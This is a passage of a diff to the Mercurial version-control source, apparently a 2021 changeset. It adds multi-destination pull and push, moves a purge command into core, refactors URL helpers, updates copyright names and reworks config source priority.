+ repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn')
+ ctx = scmutil.revsingle(repo, rev, None)
+
+ if ctx.rev() is None:
+ ctx = repo[None]
+ parents = ctx.parents()
+ taglist = []
+ for p in parents:
+ taglist.extend(p.tags())
+
+ dirty = b""
+ if ctx.dirty(missing=True, merge=False, branch=False):
+ dirty = b'+'
+ fm.data(dirty=dirty)
+
+ hexoutput = [fm.hexfunc(p.node()) for p in parents]
+ if default or id:
+ output = [b"%s%s" % (b'+'.join(hexoutput), dirty)]
+ fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty))
+
+ if num:
+ numoutput = [b"%d" % p.rev() for p in parents]
+ output.append(b"%s%s" % (b'+'.join(numoutput), dirty))
+
+ fm.data(
+ parents=fm.formatlist(
+ [fm.hexfunc(p.node()) for p in parents], name=b'node'
)
- if bmr == hexremoterev
- ]
-
- return sorted(bms)
-
- if fm.isplain():
- if bookmarks:
- output.extend(getbms())
- elif default and not ui.quiet:
+ )
+ else:
+ hexoutput = fm.hexfunc(ctx.node())
+ if default or id:
+ output = [hexoutput]
+ fm.data(id=hexoutput)
+
+ if num:
+ output.append(pycompat.bytestr(ctx.rev()))
+ taglist = ctx.tags()
+
+ if default and not ui.quiet:
+ b = ctx.branch()
+ if b != b'default':
+ output.append(b"(%s)" % b)
+
+ # multiple tags for a single parent separated by '/'
+ t = b'/'.join(taglist)
+ if t:
+ output.append(t)
+
# multiple bookmarks for a single parent separated by '/'
- bm = b'/'.join(getbms())
+ bm = b'/'.join(ctx.bookmarks())
if bm:
output.append(bm)
- else:
- fm.data(node=hex(remoterev))
- if bookmarks or b'bookmarks' in fm.datahint():
- fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark'))
- else:
- if rev:
- repo = scmutil.unhidehashlikerevs(repo, [rev], b'nowarn')
- ctx = scmutil.revsingle(repo, rev, None)
-
- if ctx.rev() is None:
- ctx = repo[None]
- parents = ctx.parents()
- taglist = []
- for p in parents:
- taglist.extend(p.tags())
-
- dirty = b""
- if ctx.dirty(missing=True, merge=False, branch=False):
- dirty = b'+'
- fm.data(dirty=dirty)
-
- hexoutput = [fm.hexfunc(p.node()) for p in parents]
- if default or id:
- output = [b"%s%s" % (b'+'.join(hexoutput), dirty)]
- fm.data(id=b"%s%s" % (b'+'.join(hexoutput), dirty))
-
- if num:
- numoutput = [b"%d" % p.rev() for p in parents]
- output.append(b"%s%s" % (b'+'.join(numoutput), dirty))
-
- fm.data(
- parents=fm.formatlist(
- [fm.hexfunc(p.node()) for p in parents], name=b'node'
- )
- )
- else:
- hexoutput = fm.hexfunc(ctx.node())
- if default or id:
- output = [hexoutput]
- fm.data(id=hexoutput)
-
- if num:
- output.append(pycompat.bytestr(ctx.rev()))
- taglist = ctx.tags()
-
- if default and not ui.quiet:
- b = ctx.branch()
- if b != b'default':
- output.append(b"(%s)" % b)
-
- # multiple tags for a single parent separated by '/'
- t = b'/'.join(taglist)
- if t:
- output.append(t)
-
- # multiple bookmarks for a single parent separated by '/'
- bm = b'/'.join(ctx.bookmarks())
- if bm:
- output.append(bm)
- else:
- if branch:
- output.append(ctx.branch())
-
- if tags:
- output.extend(taglist)
-
- if bookmarks:
- output.extend(ctx.bookmarks())
-
- fm.data(node=ctx.hex())
- fm.data(branch=ctx.branch())
- fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':'))
- fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark'))
- fm.context(ctx=ctx)
-
- fm.plain(b"%s\n" % b' '.join(output))
- fm.end()
+ else:
+ if branch:
+ output.append(ctx.branch())
+
+ if tags:
+ output.extend(taglist)
+
+ if bookmarks:
+ output.extend(ctx.bookmarks())
+
+ fm.data(node=ctx.hex())
+ fm.data(branch=ctx.branch())
+ fm.data(tags=fm.formatlist(taglist, name=b'tag', sep=b':'))
+ fm.data(bookmarks=fm.formatlist(ctx.bookmarks(), name=b'bookmark'))
+ fm.context(ctx=ctx)
+
+ fm.plain(b"%s\n" % b' '.join(output))
+ fm.end()
+ finally:
+ if peer:
+ peer.close()
@command(
@@ -4288,22 +4336,22 @@
cmdutil.check_incompatible_arguments(opts, b'subrepos', [b'bundle'])
if opts.get(b'bookmarks'):
- source, branches = hg.parseurl(
- ui.expandpath(source), opts.get(b'branch')
- )
- other = hg.peer(repo, opts, source)
- if b'bookmarks' not in other.listkeys(b'namespaces'):
- ui.warn(_(b"remote doesn't support bookmarks\n"))
- return 0
- ui.pager(b'incoming')
- ui.status(_(b'comparing with %s\n') % util.hidepassword(source))
- return bookmarks.incoming(ui, repo, other)
-
- repo._subtoppath = ui.expandpath(source)
- try:
- return hg.incoming(ui, repo, source, opts)
- finally:
- del repo._subtoppath
+ srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch'))
+ for source, branches in srcs:
+ other = hg.peer(repo, opts, source)
+ try:
+ if b'bookmarks' not in other.listkeys(b'namespaces'):
+ ui.warn(_(b"remote doesn't support bookmarks\n"))
+ return 0
+ ui.pager(b'incoming')
+ ui.status(
+ _(b'comparing with %s\n') % urlutil.hidepassword(source)
+ )
+ return bookmarks.incoming(ui, repo, other)
+ finally:
+ other.close()
+
+ return hg.incoming(ui, repo, source, opts)
@command(
@@ -4328,7 +4376,9 @@
Returns 0 on success.
"""
opts = pycompat.byteskwargs(opts)
- hg.peer(ui, opts, ui.expandpath(dest), create=True)
+ path = urlutil.get_clone_path(ui, dest)[1]
+ peer = hg.peer(ui, opts, path, create=True)
+ peer.close()
@command(
@@ -4896,10 +4946,10 @@
+ logopts
+ remoteopts
+ subrepoopts,
- _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]'),
+ _(b'[-M] [-p] [-n] [-f] [-r REV]... [DEST]...'),
helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT,
)
-def outgoing(ui, repo, dest=None, **opts):
+def outgoing(ui, repo, *dests, **opts):
"""show changesets not found in the destination
Show changesets not found in the specified destination repository
@@ -4935,47 +4985,24 @@
Returns 0 if there are outgoing changes, 1 otherwise.
"""
- # hg._outgoing() needs to re-resolve the path in order to handle #branch
- # style URLs, so don't overwrite dest.
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.ConfigError(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
-
opts = pycompat.byteskwargs(opts)
- if opts.get(b'graph'):
- logcmdutil.checkunsupportedgraphflags([], opts)
- o, other = hg._outgoing(ui, repo, dest, opts)
- if not o:
- cmdutil.outgoinghooks(ui, repo, other, opts, o)
- return
-
- revdag = logcmdutil.graphrevs(repo, o, opts)
- ui.pager(b'outgoing')
- displayer = logcmdutil.changesetdisplayer(ui, repo, opts, buffered=True)
- logcmdutil.displaygraph(
- ui, repo, revdag, displayer, graphmod.asciiedges
- )
- cmdutil.outgoinghooks(ui, repo, other, opts, o)
- return 0
-
if opts.get(b'bookmarks'):
- dest = path.pushloc or path.loc
- other = hg.peer(repo, opts, dest)
- if b'bookmarks' not in other.listkeys(b'namespaces'):
- ui.warn(_(b"remote doesn't support bookmarks\n"))
- return 0
- ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
- ui.pager(b'outgoing')
- return bookmarks.outgoing(ui, repo, other)
-
- repo._subtoppath = path.pushloc or path.loc
- try:
- return hg.outgoing(ui, repo, dest, opts)
- finally:
- del repo._subtoppath
+ for path in urlutil.get_push_paths(repo, ui, dests):
+ dest = path.pushloc or path.loc
+ other = hg.peer(repo, opts, dest)
+ try:
+ if b'bookmarks' not in other.listkeys(b'namespaces'):
+ ui.warn(_(b"remote doesn't support bookmarks\n"))
+ return 0
+ ui.status(
+ _(b'comparing with %s\n') % urlutil.hidepassword(dest)
+ )
+ ui.pager(b'outgoing')
+ return bookmarks.outgoing(ui, repo, other)
+ finally:
+ other.close()
+
+ return hg.outgoing(ui, repo, dests, opts)
@command(
@@ -5113,7 +5140,7 @@
fm = ui.formatter(b'paths', opts)
if fm.isplain():
- hidepassword = util.hidepassword
+ hidepassword = urlutil.hidepassword
else:
hidepassword = bytes
if ui.quiet:
@@ -5244,9 +5271,11 @@
:optupdate: updating working directory is needed or not
:checkout: update destination revision (or None to default destination)
:brev: a name, which might be a bookmark to be activated after updating
+
+ return True if update raise any conflict, False otherwise.
"""
if modheads == 0:
- return
+ return False
if optupdate:
try:
return hg.updatetotally(ui, repo, checkout, brev)
@@ -5268,6 +5297,7 @@
ui.status(_(b"(run 'hg heads' to see heads)\n"))
elif not ui.configbool(b'commands', b'update.requiredest'):
ui.status(_(b"(run 'hg update' to get a working copy)\n"))
+ return False
@command(
@@ -5308,11 +5338,11 @@
),
]
+ remoteopts,
- _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]'),
+ _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]...'),
helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT,
helpbasic=True,
)
-def pull(ui, repo, source=b"default", **opts):
+def pull(ui, repo, *sources, **opts):
"""pull changes from the specified source
Pull changes from a remote repository to a local one.
@@ -5336,6 +5366,10 @@
If SOURCE is omitted, the 'default' path will be used.
See :hg:`help urls` for more information.
+ If multiple sources are specified, they will be pulled sequentially as if
+ the command was run multiple time. If --update is specify and the command
+ will stop at the first failed --update.
+
Specifying bookmark as ``.`` is equivalent to specifying the active
bookmark's name.
@@ -5350,101 +5384,211 @@
hint = _(b'use hg pull followed by hg update DEST')
raise error.InputError(msg, hint=hint)
- source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch'))
- ui.status(_(b'pulling from %s\n') % util.hidepassword(source))
- ui.flush()
- other = hg.peer(repo, opts, source)
- try:
- revs, checkout = hg.addbranchrevs(
- repo, other, branches, opts.get(b'rev')
- )
-
- pullopargs = {}
-
- nodes = None
- if opts.get(b'bookmark') or revs:
- # The list of bookmark used here is the same used to actually update
- # the bookmark names, to avoid the race from issue 4689 and we do
- # all lookup and bookmark queries in one go so they see the same
- # version of the server state (issue 4700).
- nodes = []
- fnodes = []
- revs = revs or []
- if revs and not other.capable(b'lookup'):
- err = _(
- b"other repository doesn't support revision lookup, "
- b"so a rev cannot be specified."
- )
- raise error.Abort(err)
- with other.commandexecutor() as e:
- fremotebookmarks = e.callcommand(
- b'listkeys', {b'namespace': b'bookmarks'}
- )
- for r in revs:
- fnodes.append(e.callcommand(b'lookup', {b'key': r}))
- remotebookmarks = fremotebookmarks.result()
- remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks)
- pullopargs[b'remotebookmarks'] = remotebookmarks
- for b in opts.get(b'bookmark', []):
- b = repo._bookmarks.expandname(b)
- if b not in remotebookmarks:
- raise error.InputError(
- _(b'remote bookmark %s not found!') % b
+ sources = urlutil.get_pull_paths(repo, ui, sources, opts.get(b'branch'))
+ for source, branches in sources:
+ ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source))
+ ui.flush()
+ other = hg.peer(repo, opts, source)
+ update_conflict = None
+ try:
+ revs, checkout = hg.addbranchrevs(
+ repo, other, branches, opts.get(b'rev')
+ )
+
+ pullopargs = {}
+
+ nodes = None
+ if opts.get(b'bookmark') or revs:
+ # The list of bookmark used here is the same used to actually update
+ # the bookmark names, to avoid the race from issue 4689 and we do
+ # all lookup and bookmark queries in one go so they see the same
+ # version of the server state (issue 4700).
+ nodes = []
+ fnodes = []
+ revs = revs or []
+ if revs and not other.capable(b'lookup'):
+ err = _(
+ b"other repository doesn't support revision lookup, "
+ b"so a rev cannot be specified."
+ )
+ raise error.Abort(err)
+ with other.commandexecutor() as e:
+ fremotebookmarks = e.callcommand(
+ b'listkeys', {b'namespace': b'bookmarks'}
+ )
+ for r in revs:
+ fnodes.append(e.callcommand(b'lookup', {b'key': r}))
+ remotebookmarks = fremotebookmarks.result()
+ remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks)
+ pullopargs[b'remotebookmarks'] = remotebookmarks
+ for b in opts.get(b'bookmark', []):
+ b = repo._bookmarks.expandname(b)
+ if b not in remotebookmarks:
+ raise error.InputError(
+ _(b'remote bookmark %s not found!') % b
+ )
+ nodes.append(remotebookmarks[b])
+ for i, rev in enumerate(revs):
+ node = fnodes[i].result()
+ nodes.append(node)
+ if rev == checkout:
+ checkout = node
+
+ wlock = util.nullcontextmanager()
+ if opts.get(b'update'):
+ wlock = repo.wlock()
+ with wlock:
+ pullopargs.update(opts.get(b'opargs', {}))
+ modheads = exchange.pull(
+ repo,
+ other,
+ heads=nodes,
+ force=opts.get(b'force'),
+ bookmarks=opts.get(b'bookmark', ()),
+ opargs=pullopargs,
+ confirm=opts.get(b'confirm'),
+ ).cgresult
+
+ # brev is a name, which might be a bookmark to be activated at
+ # the end of the update. In other words, it is an explicit
+ # destination of the update
+ brev = None
+
+ if checkout:
+ checkout = repo.unfiltered().changelog.rev(checkout)
+
+ # order below depends on implementation of
+ # hg.addbranchrevs(). opts['bookmark'] is ignored,
+ # because 'checkout' is determined without it.
+ if opts.get(b'rev'):
+ brev = opts[b'rev'][0]
+ elif opts.get(b'branch'):
+ brev = opts[b'branch'][0]
+ else:
+ brev = branches[0]
+ repo._subtoppath = source
+ try:
+ update_conflict = postincoming(
+ ui, repo, modheads, opts.get(b'update'), checkout, brev
)
- nodes.append(remotebookmarks[b])
- for i, rev in enumerate(revs):
- node = fnodes[i].result()
- nodes.append(node)
- if rev == checkout:
- checkout = node
-
- wlock = util.nullcontextmanager()
- if opts.get(b'update'):
- wlock = repo.wlock()
- with wlock:
- pullopargs.update(opts.get(b'opargs', {}))
- modheads = exchange.pull(
- repo,
- other,
- heads=nodes,
- force=opts.get(b'force'),
- bookmarks=opts.get(b'bookmark', ()),
- opargs=pullopargs,
- confirm=opts.get(b'confirm'),
- ).cgresult
-
- # brev is a name, which might be a bookmark to be activated at
- # the end of the update. In other words, it is an explicit
- # destination of the update
- brev = None
-
- if checkout:
- checkout = repo.unfiltered().changelog.rev(checkout)
-
- # order below depends on implementation of
- # hg.addbranchrevs(). opts['bookmark'] is ignored,
- # because 'checkout' is determined without it.
- if opts.get(b'rev'):
- brev = opts[b'rev'][0]
- elif opts.get(b'branch'):
- brev = opts[b'branch'][0]
- else:
- brev = branches[0]
- repo._subtoppath = source
- try:
- ret = postincoming(
- ui, repo, modheads, opts.get(b'update'), checkout, brev
- )
- except error.FilteredRepoLookupError as exc:
- msg = _(b'cannot update to target: %s') % exc.args[0]
- exc.args = (msg,) + exc.args[1:]
- raise
- finally:
- del repo._subtoppath
-
- finally:
- other.close()
- return ret
+ except error.FilteredRepoLookupError as exc:
+ msg = _(b'cannot update to target: %s') % exc.args[0]
+ exc.args = (msg,) + exc.args[1:]
+ raise
+ finally:
+ del repo._subtoppath
+
+ finally:
+ other.close()
+ # skip the remaining pull source if they are some conflict.
+ if update_conflict:
+ break
+ if update_conflict:
+ return 1
+ else:
+ return 0
+
+
+@command(
+ b'purge|clean',
+ [
+ (b'a', b'abort-on-err', None, _(b'abort if an error occurs')),
+ (b'', b'all', None, _(b'purge ignored files too')),
+ (b'i', b'ignored', None, _(b'purge only ignored files')),
+ (b'', b'dirs', None, _(b'purge empty directories')),
+ (b'', b'files', None, _(b'purge files')),
+ (b'p', b'print', None, _(b'print filenames instead of deleting them')),
+ (
+ b'0',
+ b'print0',
+ None,
+ _(
+ b'end filenames with NUL, for use with xargs'
+ b' (implies -p/--print)'
+ ),
+ ),
+ (b'', b'confirm', None, _(b'ask before permanently deleting files')),
+ ]
+ + cmdutil.walkopts,
+ _(b'hg purge [OPTION]... [DIR]...'),
+ helpcategory=command.CATEGORY_WORKING_DIRECTORY,
+)
+def purge(ui, repo, *dirs, **opts):
+ """removes files not tracked by Mercurial
+
+ Delete files not known to Mercurial. This is useful to test local
+ and uncommitted changes in an otherwise-clean source tree.
+
+ This means that purge will delete the following by default:
+
+ - Unknown files: files marked with "?" by :hg:`status`
+ - Empty directories: in fact Mercurial ignores directories unless
+ they contain files under source control management
+
+ But it will leave untouched:
+
+ - Modified and unmodified tracked files
+ - Ignored files (unless -i or --all is specified)
+ - New files added to the repository (with :hg:`add`)
+
+ The --files and --dirs options can be used to direct purge to delete
+ only files, only directories, or both. If neither option is given,
+ both will be deleted.
+
+ If directories are given on the command line, only files in these
+ directories are considered.
+
+ Be careful with purge, as you could irreversibly delete some files
+ you forgot to add to the repository. If you only want to print the
+ list of files that this program would delete, use the --print
+ option.
+ """
+ opts = pycompat.byteskwargs(opts)
+ cmdutil.check_at_most_one_arg(opts, b'all', b'ignored')
+
+ act = not opts.get(b'print')
+ eol = b'\n'
+ if opts.get(b'print0'):
+ eol = b'\0'
+ act = False # --print0 implies --print
+ if opts.get(b'all', False):
+ ignored = True
+ unknown = True
+ else:
+ ignored = opts.get(b'ignored', False)
+ unknown = not ignored
+
+ removefiles = opts.get(b'files')
+ removedirs = opts.get(b'dirs')
+ confirm = opts.get(b'confirm')
+ if confirm is None:
+ try:
+ extensions.find(b'purge')
+ confirm = False
+ except KeyError:
+ confirm = True
+
+ if not removefiles and not removedirs:
+ removefiles = True
+ removedirs = True
+
+ match = scmutil.match(repo[None], dirs, opts)
+
+ paths = mergemod.purge(
+ repo,
+ match,
+ unknown=unknown,
+ ignored=ignored,
+ removeemptydirs=removedirs,
+ removefiles=removefiles,
+ abortonerror=opts.get(b'abort_on_err'),
+ noop=not act,
+ confirm=confirm,
+ )
+
+ for path in paths:
+ if not act:
+ ui.write(b'%s%s' % (path, eol))
@command(
@@ -5482,11 +5626,11 @@
),
]
+ remoteopts,
- _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]'),
+ _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]...'),
helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT,
helpbasic=True,
)
-def push(ui, repo, dest=None, **opts):
+def push(ui, repo, *dests, **opts):
"""push changes to the specified destination
Push changesets from the local repository to the specified
@@ -5522,6 +5666,9 @@
Please see :hg:`help urls` for important details about ``ssh://``
URLs. If DESTINATION is omitted, a default path will be used.
+ When passed multiple destinations, push will process them one after the
+ other, but stop should an error occur.
+
.. container:: verbose
The --pushvars option sends strings to the server that become
@@ -5566,75 +5713,89 @@
# this lets simultaneous -r, -b options continue working
opts.setdefault(b'rev', []).append(b"null")
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.ConfigError(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
- dest = path.pushloc or path.loc
- branches = (path.branch, opts.get(b'branch') or [])
- ui.status(_(b'pushing to %s\n') % util.hidepassword(dest))
- revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev'))
- other = hg.peer(repo, opts, dest)
-
- if revs:
- revs = [repo[r].node() for r in scmutil.revrange(repo, revs)]
- if not revs:
- raise error.InputError(
- _(b"specified revisions evaluate to an empty set"),
- hint=_(b"use different revision arguments"),
- )
- elif path.pushrev:
- # It doesn't make any sense to specify ancestor revisions. So limit
- # to DAG heads to make discovery simpler.
- expr = revsetlang.formatspec(b'heads(%r)', path.pushrev)
- revs = scmutil.revrange(repo, [expr])
- revs = [repo[rev].node() for rev in revs]
- if not revs:
- raise error.InputError(
- _(b'default push revset for path evaluates to an empty set')
- )
- elif ui.configbool(b'commands', b'push.require-revs'):
- raise error.InputError(
- _(b'no revisions specified to push'),
- hint=_(b'did you mean "hg push -r ."?'),
+ some_pushed = False
+ result = 0
+ for path in urlutil.get_push_paths(repo, ui, dests):
+ dest = path.pushloc or path.loc
+ branches = (path.branch, opts.get(b'branch') or [])
+ ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest))
+ revs, checkout = hg.addbranchrevs(
+ repo, repo, branches, opts.get(b'rev')
)
-
- repo._subtoppath = dest
- try:
- # push subrepos depth-first for coherent ordering
- c = repo[b'.']
- subs = c.substate # only repos that are committed
- for s in sorted(subs):
- result = c.sub(s).push(opts)
- if result == 0:
- return not result
- finally:
- del repo._subtoppath
-
- opargs = dict(opts.get(b'opargs', {})) # copy opargs since we may mutate it
- opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', []))
-
- pushop = exchange.push(
- repo,
- other,
- opts.get(b'force'),
- revs=revs,
- newbranch=opts.get(b'new_branch'),
- bookmarks=opts.get(b'bookmark', ()),
- publish=opts.get(b'publish'),
- opargs=opargs,
- )
-
- result = not pushop.cgresult
-
- if pushop.bkresult is not None:
- if pushop.bkresult == 2:
- result = 2
- elif not result and pushop.bkresult:
- result = 2
-
+ other = hg.peer(repo, opts, dest)
+
+ try:
+ if revs:
+ revs = [repo[r].node() for r in scmutil.revrange(repo, revs)]
+ if not revs:
+ raise error.InputError(
+ _(b"specified revisions evaluate to an empty set"),
+ hint=_(b"use different revision arguments"),
+ )
+ elif path.pushrev:
+ # It doesn't make any sense to specify ancestor revisions. So limit
+ # to DAG heads to make discovery simpler.
+ expr = revsetlang.formatspec(b'heads(%r)', path.pushrev)
+ revs = scmutil.revrange(repo, [expr])
+ revs = [repo[rev].node() for rev in revs]
+ if not revs:
+ raise error.InputError(
+ _(
+ b'default push revset for path evaluates to an empty set'
+ )
+ )
+ elif ui.configbool(b'commands', b'push.require-revs'):
+ raise error.InputError(
+ _(b'no revisions specified to push'),
+ hint=_(b'did you mean "hg push -r ."?'),
+ )
+
+ repo._subtoppath = dest
+ try:
+ # push subrepos depth-first for coherent ordering
+ c = repo[b'.']
+ subs = c.substate # only repos that are committed
+ for s in sorted(subs):
+ sub_result = c.sub(s).push(opts)
+ if sub_result == 0:
+ return 1
+ finally:
+ del repo._subtoppath
+
+ opargs = dict(
+ opts.get(b'opargs', {})
+ ) # copy opargs since we may mutate it
+ opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', []))
+
+ pushop = exchange.push(
+ repo,
+ other,
+ opts.get(b'force'),
+ revs=revs,
+ newbranch=opts.get(b'new_branch'),
+ bookmarks=opts.get(b'bookmark', ()),
+ publish=opts.get(b'publish'),
+ opargs=opargs,
+ )
+
+ if pushop.cgresult == 0:
+ result = 1
+ elif pushop.cgresult is not None:
+ some_pushed = True
+
+ if pushop.bkresult is not None:
+ if pushop.bkresult == 2:
+ result = 2
+ elif not result and pushop.bkresult:
+ result = 2
+
+ if result:
+ break
+
+ finally:
+ other.close()
+ if result == 0 and not some_pushed:
+ result = 1
return result
@@ -5740,6 +5901,7 @@
@command(
b'rename|move|mv',
[
+ (b'', b'forget', None, _(b'unmark a destination file as renamed')),
(b'A', b'after', None, _(b'record a rename that has already occurred')),
(
b'',
@@ -5771,8 +5933,13 @@
exist in the working directory. If invoked with -A/--after, the
operation is recorded, but no copying is performed.
- This command takes effect at the next commit. To undo a rename
- before that, see :hg:`revert`.
+ To undo marking a destination file as renamed, use --forget. With that
+ option, all given (positional) arguments are unmarked as renames. The
+ destination file(s) will be left in place (still tracked). The source
+ file(s) will not be restored. Note that :hg:`rename --forget` behaves
+ the same way as :hg:`copy --forget`.
+
+ This command takes effect with the next commit by default.
Returns 0 on success, 1 if errors are encountered.
"""
@@ -6083,7 +6250,7 @@
if hint:
ui.warn(hint)
- unresolvedf = list(ms.unresolved())
+ unresolvedf = ms.unresolvedcount()
if not unresolvedf:
ui.status(_(b'(no more unresolved files)\n'))
cmdutil.checkafterresolved(repo)
@@ -7043,7 +7210,12 @@
return
def getincoming():
- source, branches = hg.parseurl(ui.expandpath(b'default'))
+ # XXX We should actually skip this if no default is specified, instead
+ # of passing "default" which will resolve as "./default/" if no default
+ # path is defined.
+ source, branches = urlutil.get_unique_pull_path(
+ b'summary', repo, ui, b'default'
+ )
sbranch = branches[0]
try:
other = hg.peer(repo, {}, source)
@@ -7054,7 +7226,7 @@
revs, checkout = hg.addbranchrevs(repo, other, branches, None)
if revs:
revs = [other.lookup(rev) for rev in revs]
- ui.debug(b'comparing with %s\n' % util.hidepassword(source))
+ ui.debug(b'comparing with %s\n' % urlutil.hidepassword(source))
repo.ui.pushbuffer()
commoninc = discovery.findcommonincoming(repo, other, heads=revs)
repo.ui.popbuffer()
@@ -7066,9 +7238,22 @@
source = sbranch = sother = commoninc = incoming = None
def getoutgoing():
- dest, branches = hg.parseurl(ui.expandpath(b'default-push', b'default'))
- dbranch = branches[0]
- revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
+ # XXX We should actually skip this if no default is specified, instead
+ # of passing "default" which will resolve as "./default/" if no default
+ # path is defined.
+ d = None
+ if b'default-push' in ui.paths:
+ d = b'default-push'
+ elif b'default' in ui.paths:
+ d = b'default'
+ if d is not None:
+ path = urlutil.get_unique_push_path(b'summary', repo, ui, d)
+ dest = path.pushloc or path.loc
+ dbranch = path.branch
+ else:
+ dest = b'default'
+ dbranch = None
+ revs, checkout = hg.addbranchrevs(repo, repo, (dbranch, []), None)
if source != dest:
try:
dother = hg.peer(repo, {}, dest)
@@ -7076,7 +7261,7 @@
if opts.get(b'remote'):
raise
return dest, dbranch, None, None
- ui.debug(b'comparing with %s\n' % util.hidepassword(dest))
+ ui.debug(b'comparing with %s\n' % urlutil.hidepassword(dest))
elif sother is None:
# there is no explicit destination peer, but source one is invalid
return dest, dbranch, None, None
@@ -7101,6 +7286,12 @@
dest = dbranch = dother = outgoing = None
if opts.get(b'remote'):
+ # Help pytype. --remote sets both `needsincoming` and `needsoutgoing`.
+ # The former always sets `sother` (or raises an exception if it can't);
+ # the latter always sets `outgoing`.
+ assert sother is not None
+ assert outgoing is not None
+
t = []
if incoming:
t.append(_(b'1 or more incoming'))
@@ -7412,7 +7603,7 @@
try:
txnname = b'unbundle'
if not isinstance(gen, bundle2.unbundle20):
- txnname = b'unbundle\n%s' % util.hidepassword(url)
+ txnname = b'unbundle\n%s' % urlutil.hidepassword(url)
with repo.transaction(txnname) as tr:
op = bundle2.applybundle(
repo, gen, tr, source=b'unbundle', url=url
@@ -7428,7 +7619,10 @@
)
modheads = bundle2.combinechangegroupresults(op)
- return postincoming(ui, repo, modheads, opts.get('update'), None, None)
+ if postincoming(ui, repo, modheads, opts.get('update'), None, None):
+ return 1
+ else:
+ return 0
@command(
@@ -7708,7 +7902,7 @@
)
license = _(
b"(see https://mercurial-scm.org for more information)\n"
- b"\nCopyright (C) 2005-2021 Matt Mackall and others\n"
+ b"\nCopyright (C) 2005-2021 Olivia Mackall and others\n"
b"This is free software; see the source for copying conditions. "
b"There is NO\nwarranty; "
b"not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
--- a/mercurial/commandserver.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/commandserver.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# commandserver.py - communicate with Mercurial's API over a pipe
#
-# Copyright Matt Mackall <mpm@selenic.com>
+# Copyright Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/commit.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/commit.py Tue Apr 20 11:01:06 2021 -0400
@@ -96,6 +96,10 @@
ctx.date(),
extra,
)
+ rev = repo[n].rev()
+ if oldtip != repo.changelog.tiprev():
+ repo.register_changeset(rev, repo.changelog.changelogrevision(rev))
+
xp1, xp2 = p1.hex(), p2 and p2.hex() or b''
repo.hook(
b'pretxncommit',
@@ -108,7 +112,7 @@
targetphase = subrepoutil.newcommitphase(repo.ui, ctx)
# prevent unmarking changesets as public on recommit
- waspublic = oldtip == repo.changelog.tiprev() and not repo[n].phase()
+ waspublic = oldtip == repo.changelog.tiprev() and not repo[rev].phase()
if targetphase and not waspublic:
# retract boundary do not alter parent changeset.
@@ -116,7 +120,7 @@
# be compliant anyway
#
# if minimal phase was 0 we don't need to retract anything
- phases.registernew(repo, tr, targetphase, [repo[n].rev()])
+ phases.registernew(repo, tr, targetphase, [rev])
return n
@@ -357,6 +361,8 @@
elif fparent2 != nullid:
if ms.active() and ms.extras(fname).get(b'filenode-source') == b'other':
fparent1, fparent2 = fparent2, nullid
+ elif ms.active() and ms.extras(fname).get(b'merged') != b'yes':
+ fparent1, fparent2 = fparent1, nullid
# is one parent an ancestor of the other?
else:
fparentancestors = flog.commonancestorsheads(fparent1, fparent2)
--- a/mercurial/config.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/config.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# config.py - configuration parsing for Mercurial
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -22,14 +22,19 @@
class config(object):
def __init__(self, data=None):
+ self._current_source_level = 0
self._data = {}
self._unset = []
if data:
for k in data._data:
self._data[k] = data[k].copy()
- self._source = data._source.copy()
- else:
- self._source = util.cowdict()
+ self._current_source_level = data._current_source_level + 1
+
+ def new_source(self):
+ """increment the source counter
+
+ This is used to define source priority when reading"""
+ self._current_source_level += 1
def copy(self):
return config(self)
@@ -48,45 +53,66 @@
yield d
def update(self, src):
- self._source = self._source.preparewrite()
+ current_level = self._current_source_level
+ current_level += 1
+ max_level = self._current_source_level
for s, n in src._unset:
ds = self._data.get(s, None)
if ds is not None and n in ds:
self._data[s] = ds.preparewrite()
del self._data[s][n]
- del self._source[(s, n)]
for s in src:
ds = self._data.get(s, None)
if ds:
self._data[s] = ds.preparewrite()
else:
self._data[s] = util.cowsortdict()
- self._data[s].update(src._data[s])
- self._source.update(src._source)
+ for k, v in src._data[s].items():
+ value, source, level = v
+ level += current_level
+ max_level = max(level, current_level)
+ self._data[s][k] = (value, source, level)
+ self._current_source_level = max_level
+
